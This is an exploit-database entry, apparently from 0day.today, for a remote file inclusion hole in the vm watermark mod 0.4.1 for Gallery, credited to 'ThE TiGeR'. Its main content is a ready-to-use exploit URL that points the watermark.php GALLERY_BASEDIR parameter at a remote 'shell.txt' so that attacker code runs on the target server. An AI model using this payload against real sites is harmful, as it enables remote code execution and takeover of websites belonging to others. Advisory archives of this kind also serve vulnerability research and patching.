id: 1834
date: 05/04/2007
title: vm watermark for Gallery 0.4.1 Remote File Inclusion Vulnerability
author: ThE TiGeR
cves: 

==================================================================
vm watermark for Gallery 0.4.1 Remote File Inclusion Vulnerability
==================================================================



#vm watermark mod 0.4.1 Remote file include

#Download script : http://gallery.menalto.com/files/vm-watermark_mod-0.4.1.zip

#Exploit :

#http://www.site.com/[path]/watermark.php?GALLERY_BASEDIR=shell.txt?

#Discovered by : ThE TiGeR




#  0day.today [2023-03-24]  #